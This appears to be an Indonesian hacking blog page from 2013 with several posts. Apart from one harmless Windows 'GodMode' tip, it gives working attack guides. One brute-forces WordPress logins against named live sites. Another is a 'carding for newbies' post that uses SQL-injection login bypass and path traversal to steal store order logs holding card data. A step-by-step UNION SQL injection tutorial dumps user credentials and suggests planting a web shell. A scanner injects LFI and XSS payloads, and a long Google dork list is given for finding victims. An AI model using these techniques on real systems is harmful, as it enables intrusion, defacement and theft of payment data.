Jumat, 15 Maret 2013

Rahasia Besar Di Windows 7 "GODMODE"




Hai readers! Kembali lagi dengan saya yang mau mengungkap rahasia-rahasia dari hal-hal kecil yang tidak kita perhatikan selama ini. Jujur aja deh, berapa lama pake windows 7? Sekarang uda muncul windows 8 loh, ya jelas uda lama banget lah, hehe.

Termasuk saya sendiri, sudah cukup lama memakai windows 7, tapi baru kali ini nemuin rahasia SUPER BESAR! dari windows 7. Mau tahu apa itu? Inilah GodMode ! ( atau ModeTuhan dalam bahasa Indonesia ) Saya tidak tahu kenapa Microsoft memberi nama seperti itu. Mari kita coba saja.

1. Buat folder baru dimana saja


2. Renama folder itu dengan kode berikut ini
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

3. Tekan enter dan ... !
Inside :
Klik untuk memperbesar


Note :

Penjelasan

Penjelasan simplenya mengenai GodMode itu seperti ini. GodMode adalah 'Control Panelnya' Control Panel. GodMode akan menampilkan setting tersembunyi dan utility bawaan windows dengan tampilan yang simple. Jadi kegunaan GodMode sangat banyak! :)

Saran

Bagi readers yang berhasil membuat GodMode, bisa langsung dijadikan shortcut di desktop agar lebih mudah untuk membuka. Dengan cara :
Klik kanan GodMode > Send To > Desktop ( Create Shortcut )

Sekian Dari saya :)

Selasa, 12 Maret 2013

Cara Mudah Deface Wordpress Website Dengan WPBruteForce



Download Bahan-bahan : 
Tambahan Password 14 Juta Password


Dork: inurl:/wp-login.php
Copy kan Dork dan Telusuri di Google
Yup, saatnya kita beraksi.. :)
Live Target: http://www.van-wieringen.nl
Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute
Lalu buka comand dengan cara : Klik Start>Run>ketik cmd
Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex: 
C:\User\User_Name>cd..
C:\User>cd..
C:\>

Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter!
Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!
Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10
Lalu tekan enter!
Tunggu proses hingga selesai!
Wew! Berhasil tuh! wkwkwk Mantap! :p
Langsung Login dah!
Good Luck :D


XCode SQLI/LFI/XSS & Webshell Scanner

Masih Ingat dengan Reiluke Exploit Scanner? saya yakin banyak yang sudah pernah menggunakannya karena sudah pernah penulis bahas di forum XCode - Yogyafree dan beberapa dari pembaca pasti bertanya "mengapa saat ini tool tersebut tidak bisa digunakan lagi atau tidak memunculkan hasil pencarian dari dork?". Kira kira ini mungkin bisa menjawab rasa penasaran rekan-rekan.

Setelah penulis bedah tool Reiluke Exploit Scanner, ternyata tool ini tidak mencari langsung dork yang kita isi ke google tapi melalui http://blackle.com/. Blackle adalah website yang menggunakan source Google untuk menampilkan hasil pencarian dan beberapa waktu yang lalu Blackle.com di-block oleh Google sehingga pencarian menjadi kosong. Dan setelah beberapa waktu kemudian, pemilik website tersebut menambahkan /cse?cx= ke source script web Blackle sehingga web menjadi normal kembali.

Lalu apa hubungannya dengan reiluke? Tool ini sepertinya tidak diupdate lagi oleh pembuatnya dan Reiluke masih memanfaatkan script lama Blackle yang saat ini sudah diubah oleh pihak Blackle sendiri. akibatnya Reiluke Exploit Scanner tidak bisa lagi menampilkan hasil Dorking. Yep.. gambaran sederhananya adalah misalnya Reiluke mengirimkan perintah ke blackle yang semula dari Http://www.google.com/search?= sedangkan saat ini Blackle sudah mengubah scriptnya menjadi http://www.google.com/cse?cx= .

Penulis mencoba membuat sebuah Tool XCode SQLI/LFI/XSS Vulnurable & webshell Scanner + Google Engine yang prinsip kerjanya hampir sama dengan Reiluke Exploit Scanner.Setelah download, ekstrak semua filenya dan jalankan XCodeXploitScanner.exe, Klik Dork It dan Tool ini akan mengumpulkan Link dari Dork yang anda masukkan kemudian menampilkan listnya. setelah selesai menampilkan List, Anda akan bisa melakukan scanning kerentanan SQL injection/Local File Inclusion/Cross Site Scripting pada web yang ada di list. Tool ini akan mengirimkan parameter injeksi ke web seperti ' - * /../../../../../../../../../../../../../../etc/passwd , <h1>XXS DETECTED XCode Exploit Scanner</h1> . Jika Web tersebut memiliki bug maka di status akan muncul : 
www.target.com?blabla.php?=1234 : SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../../../etc/passwd LFI Vulnerable
www.target.com?blabla.php?=1234<h1>XXS DETECTED XCode Exploit Scanner</h1> XSS Vulnerable

Pada status list yang terdeteksi, anda bisa klik Open Vuln Link with Browser untuk menampilkan web pada browser anda

Tool ini juga menambahkan webshell hunter, dimana anda bisa mencari web shell c99, r57, c100, ITsecteam_shell, b374k, yang telah diupload oleh hacker.

Mungkin masih banyak kekurangan atau Bug yang belum diketahui oleh penulis. Tapi setidaknya tool ini bisa mempermudah anda untuk mencari target.

Semoga Berguna

Screen Shot

================================================================
Credits: 

Code name : .::XCode Exploit - Vulnurable & webshell Scanner::.
Description : - SQLI/LFI/XSS/Webshell Hunter with Google Engine -
Compiler : Microsoft Visual Basic 6.0
Author : poni 
System : Windows 95, 98, XP, Vista, 7
Size : 718 kb 
Update : I`m not sure where will i put it. Just 
check the sites below
http://www.xcode.or.id
http://ferdianelli.wordpress.com
================================================================
Info : 
XCode Exploit - Vulnurable & webshell Scanner help you to 
gather the dorks Link from Google. then you may check the 
results if its Vulnurable to exploit with SQL injection commands
, LFI,and XSS. And You may hunt the webshells those uploaded.
=================================================================
Update:
[-] Banner For Community Support
[-] 4778 Dorks | 4727 SQLI/LFI/XSS exploit dorks | 51 Webshell dorks
[-] LFI Vuln Warning Detection
[-] Google captcha form to avoid IP address blocked
[-] Google search path help user to change the search path module

Sumber :http://xcode.or.id

Jumat, 08 Maret 2013

Carding Buat Newby Part II

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Carding Buat Newby

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistemCShop
 
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces 


Trims buat Kayuagung-Cyber

Kamis, 07 Maret 2013

Pemahaman SQL INJECTION


Pengertian SQL INJECTION :
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql :
karakter: ‘ atau –
comments: /* atau –
information_schema untuk versi: mysql versi 5.x
( tidak support untuk mysql versi 4.x )
1. Cari Target + Bugnya
Cara mencarinya adalah dengan dork sql injection. Misalnya inurl:”index.php?id=” search dengan om GOOGLE, misalkan kita mendapatkan alamat situs
http://www.target.com/index.php?id=4
Lalu untuk mengetahui suatu web memiliki bug SQL injection, tambahkan sebuah tanda petik pada akhir url, sehingga urlnya menjadi
http://www.target.com/index.php?id=4’
lalu tekan enter dan apa yang terjadi pada situs tersebut? Situsnya menampilkan pesan error, berarti parameter id tidak di filter dengan baik atau bahkan tidak difilter sama sekali. Untuk mengetahui suatu web aplikasi memiliki bug SQL Injection salah satunya adalah menggunakan perintah and+1=1–
Ketika di tambahkan parameter +and+1=1– pada akhir URL, situsnya tampil dengan normal karena 1=1 menghasilkan nilai true.
http://www.target.com/index.php?id=4+and+1%3D1–
Dan ketika di tambahkan parameter +and+1=2– isi berita tidak dapat ditampilkan karena 1=2 hasilnya false dan ini membuktikan bahwa web aplikasi tersebut 99.9% memiliki bug SQL Injection
http://www.target.com/index.php?id=4+and+1%3D2–
2. Cari Column Yang Memiliki Celah Injection
Setelah saya tau bahwa web tersebut memiliki Bug SQL Injection saya harus mencari tau nama table dan column, tapi sebelum itu saya harus mencari tau pada column ke berapa saya bisa melakukan Injection, untuk itu saya menggunakan perintah +order+by+ perhatikan url berikut
http://www.target.com/index.php?id=4+order+by+1–
http://www.target.com/index.php?id=4+order+by+2–
http://www.target.com/index.php?id=4+order+by+3–
http://www.target.com/index.php?id=4+order+by+4–
http://www.target.com/index.php?id=4+order+by+5– url diatas jika di coba satu persatu akan menampilkan situsnya secara normal. Tapi ketika saya menginputnya dengan order+by+6– apa yang terjadi??? Browser menampilkan pesan error. Dari pesan error tersebut bisa dipastikan terdapat 5 buah column yang terdapat disalah satu table yang belum kita ketahui namanya. Berarti yang kita ambil sampai +order+by+5– saja.
3. Gunakan Perintah Union Select
Setelah saya mengetahui terdapat 5 buah column pada target, selanjutnya yaitu mencari column yang bisa dilakukan injeksi. Untuk itu saya menggunakan perintah +union+select+ (pakai union all select juga bisa koq) sehingga urlnya menjadi :
http://www.target.com/index.php?id=4+union+select+1%2C2%2C3%2C4%2C5–
Dan apa yang tampak di browser tidak ada yang aneh bukan? situsnya tampil dengan normal. Tetapi jika parameter id saya ganti menjadi -4 yang pastinya tidak ada isi data -4 di Database.
http://www.target.com/index.php?id=-4+union+select+1%2C2%2C3%2C4%2C5–
Oke disini browser menampilkan angka 2 & 3, dan angka inilah yang sering disebut dengan angka ajaib, karena angka tersebut adalah letak column dimana attacker bisa melakukan injeksi lebih lanjut.

4. Cari informasi Database Target
Dengan tampilnya angka ajaib tersebut anda bisa ‘mengintip’ beberapa informasi seperti nama database, nama user database, versi database, sessi user dll. Untuk melihat nama database, injeksi urlnya menjadi
http://www.target.com/index.php?id=-4+union+select+1%2Cdatabase%28%29%2C3%2C4%2C5–
Dan disini browser menampilkan nama database yaitu xyb_injector. Saya mencoba mengintip lagi nama user database pada situs tersebut dengan menginjeksinya pada column ke-2 dan versi pada column ke-3 dan url injeksinya menjadi :
http://www.target.com/index.php?id=-4+union+select+1%2Cuser%28%29%2Cversion%28%29%2C4%2C5–
Ternyata user dabasenya root@localhost dan beruntung sekali karena versi mysql yang di gunakan adalah versi 5.0.51a-community, lho emang kenapa kalo versi 5??? Karena bisa dilanjutin bacanya , kalo misalkan versi 4 tinggalin aja deh, cari target baru, hahahaha ☺.
Coba anda perhatikan, anda hanya bisa meng-injeksi satu perintah pada satu column. Bisakah meng-injeksi lebih dari satu perintah pada satu colums??? Heheheh tentu saja bisa dong, untuk itu anda bisa menggunakan perintah yang sudah disediakan langsung oleh mysql yaitu perintah concat(perintah1,perintah2). Contoh dibawah ini saya meng-intip nama user dan nama database pada column ke-2 dan pada column ke-3 saya mengintip versi databasenya.
http://www.target.com/index.php?id=4+union+select+1%2Cconcat(user(),0x3a,d atabase()),version(),4,5–
5. Dapatkan Nama Table
Saya sudah mendapatkan informasi database web tersebut, sebenarnya yang saya butuhkan hanyalah versi databasenya saja, seperti yang sudah anda lihat, versi database yang ditampilkan adalah 5.0.51a-community dan tentu ini memudahkan saya dalam mendapatkan table dengan menggunakan perintah table_name pada column yang memiliki bug yaitu angka 2 atau 3 pada web tersebut. Di akhir statement tambahkan from+information_schema.tables+where+table_schema= database()+limit+0,1–
Sehingga urlnya menjadi :
http://www.target.com/index.php?id=4+union+select+1%2C2%2Ctable_name%2C4%2C5+from+information_schema.tables+where+table_schema=dat abase()+limit+0,1–
Di web tersebut tampil sebuah table bernama “table_attacker”. Untuk melihat seluruh table sekaligus gunakan perintah group_concat(table_name) pada column yang memiliki bug, sehingga urlnya menjadi
http://www.target.com/index.php?id=4+union+select+1%2C2%2Cgroup_concat(table _name),4,5+from+information_schema.tables+where+ta ble_schema=database()–
Hihihi sip, seluruh table berhasil saya dapatkan, diantara table tersebut, table manakah yang harus saya telusuri lebih jauh lagi??? table_user sepertinya menarik yuk kita lihat apa isinya.
6. Dapatkan Nama Column
table_user sudah saya dapatkan selanjutnya yaitu mencari nama column pada table tersebut, untuk itu saya menggunakan perintah group_concat(column_name) sehingga urlnya menjadi
http://www.target.com/index.php?id=4+union+select+1%2C2%2Cgroup_concat(colum n_name),4,5+from+information_schema.columns+where+ table_name=0xhexa–
pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Salah satu website yg digunakan untuk konversi :
http://www.string-functions.com/string-hex.aspx
Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi
http://www.target.com/index.php?id=4+union+select+1%2C2%2Cgroup_concat(colum n_name),4,5+from+information_schema.columns+where+ table_name=0x7461626c655f75736572–
Alhasil nama column dari table_user sudah saya dapatkan yaitu user_id dan password_id.
7. Dapatkan Usename & Password
Saya sudah mendapatkan nama table “table_user” yang berisi 2 buah column yaitu “user_id” dan “password_id” dan akhirnya anda sudah sampai di detik-detik terakhir yaitu menampilkan isi data dari column tersebut. Tambahkan 0x3a pada group_concat(hasil isi column yg mau dikeluarkan,0x3a, hasil isi column yg mau dikeluarkan) perintah +from+(nama table berasal) dimasukkan setelah angka terakhir sehingga urlnya menjadi :
http://www.target.com/index.php?id=4+union+select+1%2C2%2Cgroup_concat(user_ id,0x3a,password_id),4,5+from+table_user–
Tampillah seluruh username dan password dari situs tersebut. Biasanya password yang kita dapat sudah terenkripsi dalam bentuk md5 atau enkripsi yang lainnya. Untuk menterjemahkannya anda bisa mencari website yang menyediakan cracking password atau dengan tool cracking password. Setelah itu anda tinggal mencari halaman log in admin dan masuki sistemnya. Setelah memasuki sistem biasanya hacker menanamkan php shell untuk lebih gampang keluar masuk dan bisa mengexplore isi dari website tersebut terlebih lagi si hacker bisa melakukan teknik jumping sehingga semua website yang berada dalam 1 server yang sama dengan website yang terkena hack tersebut bisa di ambil alih oleh hacker tersebut, berbahaya sekali bukan?

Download Versi PDFnya Disini
+ tambahan +   Dork

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:top.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:ost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:age.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran**.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:tray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:top.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:ost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:age.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran**.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl: info.php?id=
inurl:pro.php?id=

Trims buat Mas Syntax Error :D